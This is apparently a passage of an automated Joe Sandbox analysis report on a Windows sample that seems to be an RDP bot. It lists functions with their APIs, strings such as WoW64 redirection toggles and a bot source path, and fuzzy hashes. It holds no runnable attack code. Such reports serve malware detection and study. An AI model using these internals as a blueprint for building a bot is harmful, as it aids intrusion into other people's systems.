Instruction Fuzzy Hash: BF31D172E18642C5EB60AE679894578E290EF44BA8F84E133DD1D8BB85DE2CE4018F60

Function 00007FF764CC385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF764CC1CF4: LoadLibraryA.KERNEL32 ref: 00007FF764CC1D02

GetLastError.KERNEL32 ref: 00007FF764CC38D8

Part of subcall function 00007FF764CC1C73: GetProcAddress.KERNEL32 ref: 00007FF764CC1C93

Strings

kernel32, xrefs: 00007FF764CC3869
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF764CC38E8
Wow64RevertWow64FsRedirection, xrefs: 00007FF764CC387D
fs_wow_redir_revert, xrefs: 00007FF764CC38BB, 00007FF764CC38E1
Done, xrefs: 00007FF764CC38B4
[I] (%s) -> %s, xrefs: 00007FF764CC38C2

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: a1163239072c5e3b007d0723148a620b3626d1c35fe5edc271344cef0e6d409f
Instruction ID: aae1a1147b5eff9f82401b7d25687a3453459e0107ac7078aab7bae9552cb6ca
Opcode Fuzzy Hash: a1163239072c5e3b007d0723148a620b3626d1c35fe5edc271344cef0e6d409f
Instruction Fuzzy Hash: B8119360E19A43E1FE21BF1BA8C13B4E6506F54304FC01037D44D56BB2EE6DE549CB60

Function 00007FF764CC37C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF764CC1CF4: LoadLibraryA.KERNEL32 ref: 00007FF764CC1D02

Part of subcall function 00007FF764CC1C73: GetProcAddress.KERNEL32 ref: 00007FF764CC1C93

GetLastError.KERNEL32 ref: 00007FF764CC3820

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Strings

kernel32, xrefs: 00007FF764CC37C4
fs_wow_redir_disable, xrefs: 00007FF764CC3803, 00007FF764CC3829
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF764CC3830
Wow64DisableWow64FsRedirection, xrefs: 00007FF764CC37D8
Done, xrefs: 00007FF764CC37FC
[I] (%s) -> %s, xrefs: 00007FF764CC380A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: e4e19c2aad9346fb89ce7b23d1cf737269ca9b7c49a29349c8f40fb2de451c24
Instruction ID: ccec964e07b37380fd8784405280e6fb396a550c514a3abb4fd4c6781637ede8
Opcode Fuzzy Hash: e4e19c2aad9346fb89ce7b23d1cf737269ca9b7c49a29349c8f40fb2de451c24
Instruction Fuzzy Hash: F2018064E18943E1FE21BF1BA8D02B4E6606F54704FC06037D40E86BB2EE6EE945CB60

Function 00007FF764CC33C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF764CC33D8
CloseHandle.KERNEL32 ref: 00007FF764CC33DE

Strings

(pi != NULL), xrefs: 00007FF764CC33FB
process_free, xrefs: 00007FF764CC3402
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC33F4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC3409

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseHandle
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
API String ID: 2962429428-1801624891
Opcode ID: f0180c40217310ddaf9a2907391c50a8977b70553ddb4cbf28bc3dd89bb39de8
Instruction ID: c8c8ac816acd70a40f20cfe5c26e90277a9aaeddce81391ec7340fbe144f5d78
Opcode Fuzzy Hash: f0180c40217310ddaf9a2907391c50a8977b70553ddb4cbf28bc3dd89bb39de8
Instruction Fuzzy Hash: F3F0F861A0885AD0EE10EF66F8A05E8A720BF44748FC84133DA0D477A0AE3CD947C760

Function 00007FF764CC7E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32 ref: 00007FF764CC7E82
GetLastError.KERNEL32 ref: 00007FF764CC7E90

Strings

[E] (%s) -> QueryDosDeviceW failed(gle=%lu), xrefs: 00007FF764CC7EA2
%S%S, xrefs: 00007FF764CC7F88
path_convert_to_nt, xrefs: 00007FF764CC7E9B

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: DeviceErrorLastQuery
String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
API String ID: 963133057-3473575966
Opcode ID: 96fb14efba710c141bb335b8f3c32ab00cd84db9b91770259451e3a57f39f35f
Instruction ID: 5661b4322b2e4eeb2fcc45edb617cc151169e429d416986429ffd3f75ae4165e
Opcode Fuzzy Hash: 96fb14efba710c141bb335b8f3c32ab00cd84db9b91770259451e3a57f39f35f
Instruction Fuzzy Hash: 97417B13E0E567C6FA707E1AA4C03B9D251EF40B94F952037DD5E173C1EE6CAC81AAA1

Function 00007FF764CCCCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF764CCCD2A

Strings

%-*.*s, xrefs: 00007FF764CCCD23
%S%S, xrefs: 00007FF764CCCCDB
%.*s, xrefs: 00007FF764CCCD37
%*.*s, xrefs: 00007FF764CCCD1A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fwprintf
String ID: %*.*s$%-*.*s$%.*s$%S%S
API String ID: 968622242-2451587232
Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction ID: 7e1ed3601e7af5eb0924bc5d44470acf6af70d7966ce0515c1dc49095c672e78
Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction Fuzzy Hash: 8E318472F08603C5E770AE279884679EB92EF44B94F84E133D90D8B785DE2CE8019F60

Function 00007FF764CC193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC1956
DeleteCriticalSection.KERNEL32 ref: 00007FF764CC1983

Strings

debug_cleanup, xrefs: 00007FF764CC199B
Done, xrefs: 00007FF764CC1994
[I] (%s) -> %s, xrefs: 00007FF764CC19A2

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: 516a6b51dd18c9db523f3b99fb8c0a87e7684494f60d68de8cd217c2c27a3df6
Instruction ID: 7fb82f88b92b60fbfb4eb868a1173b8d15dc6733361d6c969582013baad4febf
Opcode Fuzzy Hash: 516a6b51dd18c9db523f3b99fb8c0a87e7684494f60d68de8cd217c2c27a3df6
Instruction Fuzzy Hash: 0CF09224A09643C5FE14BF57E8E43B5A760AF85304FC85537C00D563A1DF6E6049D760

Function 00007FF764CCA96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF764CDA1E8,00000000,?,?,?,00007FF764CDA1E0,00007FF764CC1208,?,?,?,00007FF764CC1313), ref: 00007FF764CCABC2

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF764CCAB5D
Unknown pseudo relocation bit size %d., xrefs: 00007FF764CCAAEB
Unknown pseudo relocation protocol version %d., xrefs: 00007FF764CCAA62

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction ID: 9bdc52d9f671a63f8c81e6919ea25f58977fcec996520706e3e51a2842e8380f
Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction Fuzzy Hash: 0F619F71F08502D9EA20AF57D588378B3A1AB84794F84A137C91D437D5DE3EE581CF20

Function 00007FF764CC19C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FF764CC19DE
GetLastError.KERNEL32 ref: 00007FF764CC19FB

Strings

module_current, xrefs: 00007FF764CC1A04
[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF764CC1A0B

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: e49a3d3ce0dc75b7e694a28af21553a79d4703dc04341766b27d901c948abc4c
Instruction ID: f5164b3733b1d443a56c0c8724ac59f77497a51c3f6118a3a06051d7a1900729
Opcode Fuzzy Hash: e49a3d3ce0dc75b7e694a28af21553a79d4703dc04341766b27d901c948abc4c
Instruction Fuzzy Hash: 00F01C24A08602C0EB30AF5AE4803A9AB60EF44398FC45133C54D027A8DE2CD149CF20

Function 00007FF764CD0150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF764CD01CB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF764CD01E6
MultiByteToWideChar.KERNEL32 ref: 00007FF764CD023A
_errno.MSVCRT ref: 00007FF764CD0244

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction ID: 466167b9e3471fb0b0ea379e321396f2925be106ac78a036eaf6317059412b49
Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction Fuzzy Hash: 5931EA72A0D282C9FB705F279480379E690AB9678CF844136DA9C437D5DF3CD545C720

Function 00007FF764CCAC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF764CCACE6
signal.MSVCRT ref: 00007FF764CCACFB

Strings

CCG , xrefs: 00007FF764CCAC46

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction ID: 89fe9a61647404e3f885d4208e2199dd7d46ef15409ba6882720d735289ef113
Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction Fuzzy Hash: A721D361E0C502C7FE747A1784C8338A1829FC5365FA8A937C90E823E1DE5FB8C19A31

Function 00007FF764CCA6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

Unknown error, xrefs: 00007FF764CCA6E7
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction ID: c0628115c0cdff1e14157074193475bb29aba1e752ebbcec768041386d5fb495
Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction Fuzzy Hash: AD117362908E84C2D6119F1DE0413EAB370FF9A359F505326EBC816364DF3AD152CB00

Function 00007FF764CCA710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D
Overflow range error (OVERFLOW), xrefs: 00007FF764CCA710

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction ID: 9b72368a28b92044cb128bd8e9c870a4f4d05fab9de360c31b8efe303874e73d
Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction Fuzzy Hash: C5F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926665DF2DD542CB10

Function 00007FF764CCA707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D
Argument domain error (DOMAIN), xrefs: 00007FF764CCA707

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction ID: c00a5ce81d7d4775460beb195b4dd8c8f45122230e6093657ccbdd0ad566e119
Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction Fuzzy Hash: 79F01D66808F84C2D6119F19E4402ABF370FF9E789F605327EBC926665DF2DD546CB10

Function 00007FF764CCA72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF764CCA72B

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction ID: db2476cab303480e3135a4c7cf0be770779b9105d7e8db5e44387fbfbcaab444
Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction Fuzzy Hash: E3F01D66808F84C2D6119F19E4802ABB370FF9E789F606327EBC926665DF3DD542CB10

Function 00007FF764CCA722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

Total loss of significance (TLOSS), xrefs: 00007FF764CCA722
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF764CCA77D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction ID: bac73c1e986576231aad4c2760161a4887bec97755052f1ac6df457b2e988025
Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction Fuzzy Hash: 02F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926664DF2DD542CB10

Function 00007FF764CCA719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF764CCA78A

Strings

